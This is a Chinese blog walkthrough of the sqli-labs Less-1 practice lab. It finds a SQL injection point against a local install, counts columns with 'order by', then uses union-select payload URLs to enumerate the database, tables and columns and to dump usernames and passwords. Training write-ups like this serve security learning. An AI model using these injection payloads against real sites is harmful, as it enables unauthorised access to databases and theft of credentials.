美文网首页
sqli-labs Less-1

sqli-labs Less-1

作者: zzqsmile | 来源:发表于2018-03-19 18:27 被阅读0次

1.首先来到less-1

1.png 2.png
2.请以数字值作为参数输入id。
  • url后面输入?id=1
3.png

大家可能此时与我不同的是

your sql statement is SELECT * FROM users WHERE id='1' LIMIT 0,1

这是为了方便我们自己看到底执行的sql语句是什么显示出来的。那么你也可以添加以下,方法如下:
编辑less-1下的index.php文件
将代码echo "your sql statement is ".$sql."<br>";插入到如下图所示位置

4.png
之后刷新页面即可。
3.寻找注入点
  • 在正常的参数值后面后加一个英文字符 ',可以看到页面出现了异常,说明此处可能存在注入。
5.png
  • 接下来在后面加入--+,发现页面显示正常,这是因为--+注释了后面的sql语句,即注入的'正好闭合了sql语句中的单引号,如下:
图片.png
  • 然后继续注入' and 1=1’ and 1=2,进一步确认注入点,如下:
    ' and 1=1页面显示正常,’ and 1=2页面显示不正常。
图片.png 图片.png

至此,我们可以确认此注入点存在sql注入

4.接下来用order by 语句猜有几个字段
实际操作中采用二分法。
当插入?id=1' order by 3 --+,页面正常显示:

url:

http://127.0.0.1/sqli-labs/Less-1/?id=1'
6.png
当插入?id=1' order by 4 --+,页面异常: 7.png
此时说明查询的表中有3个字段
5. 此时可以继续使用 union select联合查寻。 8.png

页面正常无变化,没关系,这是limit 限制了只显示一条结果,即前面id = 1 已经有一个结果了,那好,我们将前面设置为0,让它查不到结果看看.

url:    http://127.0.0.1/sqli-labs/Less-1/?id=0%27%20union%20select%201,2,3%20--+
9.png
惊喜吧!!看到2,3了吧。
说明第2、3个字段可以显示到页面
6. 先来看看常用查询的数据库,版本号,当前登录的账号信息吧! 10.png 11.png

可以查询到数据库名security,版本5.5.53,当前登录账户:root@localhost
7. 接下来查表名
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,table_name from information_schema.tables where table_schema = "security" --+
12.png

可以看到查询到一个表,接下来使用group_concat()函数将所有表列出来
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = "security" --+
13.png
可以看到一共四个表:emails,referers,uagents,users
8.接下来查关注的users表中字段
url: 
http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "users" and table_schema = "security" --+
14.png
9. 最后就是查看表中字段内容了
url:
http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,group_concat(username),group_concat(password) from users --+ 15.png
10.这样有点不美观,可以这样做:
url: 
http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,concat_ws("~",username,password) from users --+
16.png

显示了一个用户名密码,不爽:
url:

http://127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(concat_ws("~",username,password)) from users --+
17.png

这样就完美了,nice.

最后附图一张,information_schema数据库主要表结构

image.png

说明:当数据库版本大于5以上,数据库中将有information_schema数据库,这个数据库中包含数据库里面所有数据库的表、字段以及数据库名字。
schemata 这张表存放了所有数据库的信息
tables 这张表存放了所有数据库的所有表的信息
columns 这张表存放了所有数据库的所有表中的字段信息

相关文章

  • sqli-labs write up

    sqli-labs [TOC] Less-1: error based string 判断参数ID类型?id=1 ...

  • sqli-labs Less-1

    1.首先来到less-1 url后面输入?id=1 大家可能此时与我不同的是 这是为了方便我们自己看到底执行的sq...

  • sqli-labs Less-1

    大一开学面试校科协计算机部时,舒畅学姐给我出的题就是sql注入,一年多以后,我终于做出我的第一个sql注入题。先分...

  • sqli-labs (less-1)

    Less1 核心代码 在用户表中查询一条用户信息,在页面中显示这条信息的用户名密码 具体后台mysql中操作的结果...

  • sqli-labs Less-1

    MySQL中的information_schema数据库表说明:SCHEMATA表:提供了当前MySQL实例中所有...

  • sqli-labs修炼【1-10】

    摘要:本篇是关于sqli-labs第1到第10关的闯关记录 Less-1 单引号闭合,有错误提示,有查询返回点 根...

  • 搭建sqli-labs注入平台

    搭建SQL注入平台 docker搭建sqli-labs 运行sqli-labs 初始化数据库 访问sqli-labs

  • [sqli-labs]Less-1(明注 , Bool盲注 ,

    打开主页进入第一关 : 提示传入id这个参数 发现这个页面会根据传入的ID查询到对应的用户这里我们可以通过查看数据...

  • SQLi-Labs 练习总结 Page-1 Less-1

    SQLi-LABS 练习总结 Page-1 基础练习 写在前面:SQL注入是一个需要不断尝试的过程,其中可能出现很...

  • sqli-labs靶场Less-62题解(少于130次)

    sqli-labs[https://github.com/Audi-1/sqli-labs]靶场Less-62题目...

网友评论

      本文标题:sqli-labs Less-1

      本文链接:https://www.haomeiwen.com/subject/fjppqftx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|sqli-labs Less-1|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!